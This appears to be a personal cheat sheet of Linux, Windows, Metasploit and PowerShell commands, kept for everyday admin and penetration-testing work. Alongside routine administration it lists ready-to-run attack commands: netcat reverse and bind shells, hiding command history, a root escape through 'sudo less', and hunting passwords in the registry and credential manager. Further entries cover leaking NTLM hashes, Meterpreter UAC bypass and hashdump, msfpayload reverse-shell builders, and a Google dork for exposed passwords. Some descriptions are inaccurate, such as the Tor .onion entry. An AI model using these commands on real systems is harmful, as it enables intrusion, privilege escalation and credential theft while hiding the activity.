commands to memorize/know
More to come, be shure....
This is an ongoing project of things I need all the time but somehow doesn't stick to my brain and needs a place to live to be remembered every day.
Very special thx to SYNjunkie for his inspiration
Linux
| shell command | description |
|---|---|
| netstat -Tul | show all active waiting sockets |
| update-rc.d [service] enable | enables the service to start automatically at boot time |
| | cut -d "[delimiter]" -f [field number to extract] | print out the defined field [-f x] of a line of text |
| for [variablename] in $(cat input.txt); do [comand] $variablename; done | action each line of an textfile with [command] |
| nc -nv 1.2.3.4 110 | connect netcat to IP 1.2.3.4 port 110 (client) |
| nc -nlvp 4444 | have netcat receive data on port 4444 (server) |
| nc -nlvp 4444 > incoming.exe | have netcat receive data and write this to incoming.exe |
| nc -nlvp 4444 -e cmd.exe | have netcat offer a shell on port 4444 |
| nc -nv 1.2.3.4 4444 -e /bin/bash | have netcat send (and start) a remote shell on the dest. system |
| ncat ‐exec cmd.exe ‐allow 1.2.3.4 ‐vnl 4444 ‐ssl | have netcat allow a shell access via SSL from source 1.2.3.4 only |
| tcpdump -i eth0 -nX | dump eth0 & display data in HEX |
| nmap -v -p 139,445 --script-args=unsafe=1 --script=smb-check-vulns [target IP] | Check 1.2.3.4 for SMB vulns |
| nbtscan | |
| enum4linux | |
| nmap -T4 -O [target ip-range] | noisy but quick scan |
| Acquire::http::proxy "http://proxy.company.com:80/"; Acquire::https::proxy "https://proxy.company.com:80/"; Acquire::ftp::proxy "ftp://proxy.company.com:80/"; | apt to use proxy (/etc/apt/apt.conf) |
| unset HISTFILE | deactivate writing down command history for the duration of your session |
| set HISTFILE=/~/.bash_history | revert the above deactivation |
| Add more space or new disk in vmware | |
| reboot | |
| cfdisk | create LVM (type 8e) partition |
| pvcreate /dev/[new partition] | |
| vgs | write down the VG name |
| vgextend [VG name] /dev/[new partition] | |
| lvextend -rl +100%FREE /dev/[VG name]/[mount point name] | Use all available space and also resize |
| resize2fs -p /dev/[VG name]/[mount point name] oder: lvextend --resizefs -l +100%FREE /dev/[VG name]/[mount point] grub-mkdevicemap update-grub | Create the data layout at the new space |
| df -h | check if new space is available |
| timedatectl | check the system time and other time configs |
| sudo timedatectl set-timezone Europe/Berlin | set the timezone to Europe/Berlin |
| [shift] | Hold shift while booting to enter extd. boot menu. |
| at linux= add init=/bin/bash at the end of line | boot into bash |
| mount -o remount,rw / | remount root as RW to make changes |
| du -ahm ./ | sort -n -r | head -20 | display the 20 biggest entries in filesystem at ./ |
| sudo less [file] | {ESC] !/bin/sh | get a shell as root from "sudo less" |
Create a new GIT repository and push the initial content:
git commit -m "First commit"
git config --global --add safe.directory ]/.../]
git remote add origin https://github.com/icepaule/TGMON.git
git remote -v
git add .
git push origin main
Windows
| shell command | description |
|---|---|
| netstat -ano | show all active waiting sockets |
| net start | show all running services |
| pushd \\[SMB-Share\]Directory] | map SMB share to the next free drive letter and chdir into it |
| [cmd1] && [cmd2] | Run [cmd1] and if successfull run [cmd2] |
| psexec \\[NB-Name of dest] cmd | open a remote shell on dest |
| psexec \\[NB-Name\Dir cmd /c [cmd1] | psexec and run [cmd1] |
| systeminfo | findstr /B /C:"OS Name" /C:"OS Version" | Get the OS version |
| net users | show the local user accounts |
| netsh firewall show state | show the FW status |
| schtasks /query /fo LIST /v | show the scheduled tasks |
| tasklist /SVC | show the running services |
| DRIVERQUERY | look for outdated or dodgy drivers installed |
| psexec @serverlist.txt -c "\\File-Server\SecurityPatches$\MS08-067.exe /quiet /norestart /overwriteoem" | Use PSEXEC to deploy some software (i.e. a patch, nc, meterpreter, etc.) |
| gc c:\servers.txt | ForEach-Object { gwmi win32_operatingsystem -ComputerName $_ | ForEach-Object { $_.reboot() }} | PS to reboot the machines in c:\servers.txt |
| NET LOCALGROUP Administrators | List all local administrators |
| query session | Get a list of currently logged on local users |
| DSQUERY USER -name *pauli* | DSGET USER -samid –display | Search for user by last name within the domain |
| DSQUERY Server -o rdn | Find the PDC |
| nltest /dclist:%userdomain | Show all DC's of the domain your'e in |
| dsquery user -limit 0 | List all users in the domain |
| dsquery user domainroot -stalepwd 180 -limit 0 | List stale user accounts |
| dsquery user domainroot -disabled -limit 0 | List disabled user accounts |
| reg query HKLM /f password /t REG_SZ /s | find passwords in registry |
| cmdkey /list | dump the cerdential manager information |
| net use file://[IP] | send your hash to [IP] |
meterpreter
| shell command | description |
|---|---|
| getuid | display my server- and username |
| getprivs | show my priviledges |
| background | backround my session and give me a new cmd |
| use exploit/windows/local/bypassuac | bypass UAC |
| after that: set SESSION [backgrounded session #] | |
| after that: set PAYLOAD windows/meterpreter/reverse_tcp | define the new meterpreter session to use the bypass UAC |
| after that: SET LHOST [Victim IP] | |
| after that: SET LPORT´[Port to receive the new session] | |
| clear | clear your screen |
| ps | show the active process list (with users) |
| migrate [process nbr] | migrate my session to run as the process # user rights |
| hashdump | dump the hash table |
| sessions -l | display all available sessions |
| ------------------------------------- | ------------------------------------- |
| use exploit/windows/smb/psexec | Extract hashdump |
| set payload windows/meterpreter/reverse_tcp | |
| set SMBPass xxxxx | |
| shell | |
| hashdump |
Google Hacks
| shell command | description |
|---|---|
| intitle:index.of.dropbox passw | Find open Dropbox shares with password information |
metasploit
| shell command | description |
|---|---|
| ./msfpayload windows/shell_bind_tcp LPORT=4444 X > /tmp/Listen-shell.exe | Create a simple Windows listener |
| nc [target IP] 4444 | connect to listener |
| ./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=[target IP] E | simple reverse shell |
| ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 X > /tmp/reverse-vnc.exe | VNC |
| ./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 DisableCourtesyShell=TRUE E | |
| ./msfpayload windows/meterpreter/bind_tcp LPORT=4444 X > met-listen.exe | meterpreter listener |
| ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=[target IP] LPORT=4444 E | |
| setg | set the variable global, so that it will last even for the next "use" command |
powershell
| shell command | description |
|---|---|
| #Find-Files.ps1 $1 = (read-Host "Enter start date e.g yyyy/mm/dd") $2 = (read-Host "Enter finish date e.g yyyy/mm/dd") $path = (Read-Host "Enter path of target e.g \\server\c$\windows\") $results = (Read-Host "Where do you want the results saved to? e.g c:\temp\") $start = [datetime]$1 $end = [datetime] $2 $period = {$_.lastwritetime -gt $start -and $_.lastwritetime -lt $end} gci $path -Recurse | where {!$_.psiscontainer -and (.$period)} | Out-File -Width 255 $Results | Thanks to http://synjunkie.blogspot.co.uk/2008/10/finding-modified-files.html this will find modified files (even on remote boxes) |
| Install-windowsfeature Server-Gui-Mgmt-Infra, Server-Gui-Shell -Restart | Install/Enable the Server GUI on a core install |
| OR: Dism /online /enable-feature /featurename:ServerCore-FullServer /featurename:Server-Gui-Shell /featurename:Server-Gui-Mgmt | Install/Enable the Server GUI on a core install |
| Import-module servermanager Uninstall-windowsfeature -name Server-GUI-Mgmt-Infra,Server-GUI-Shell | Uninstall the Server GUI on a core install |
remote access for monitoring
| shell command | description |
|---|---|
| psexec -u [domain]\[username] \\[hostname] cmd | get a remote shell on [hostname] |
| pushd \\[server]\share | map the next free drive letter to the share AND chdir into it |
| winpmem_1.6.2.exe %COMPUTERNAME%/%COMPUTERNAME%.dmp >>%COMPUTERNAME%/%COMPUTERNAME%.log | save a memory dump |
| md5 %COMPUTERNAME%/%COMPUTERNAME%.dmp >>%COMPUTERNAME%/%COMPUTERNAME%.md5 | md5 CRC of the memory dump |
| sysmon -accepteula -n -i >>%COMPUTERNAME%/%COMPUTERNAME%.log | Install sysmon as a service |
regex
| regex | action |
|---|---|
| [^\:]+ | jump to ":" |
zfs - transactional file system
zpool status [pool name] -v
You can attempt to resolve more minor data corruption by using scrubbing the pool and clearing the pool errors in multiple iterations. If the first scrub and clear iteration does not resolve the corrupted files, run them again.
zpool scrub [pool name]
zpool clear [pool name]
vmware ESXi
| shell command | description | |
| esxcli software profile get | get the -p parameter for next command ("
| |
esxcli software profile update -d https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml -p ESXi-7.0U3n-21930508-standard --no- hardware-warning | update from vmware with the latest patch available for
|
tor .onion
| shell command | description |
| wget -qO - https://api.ipify.org; echo | get your real ip address |
| torsocks wget -qO - https://api.ipify.org; echo | get your .onion-address |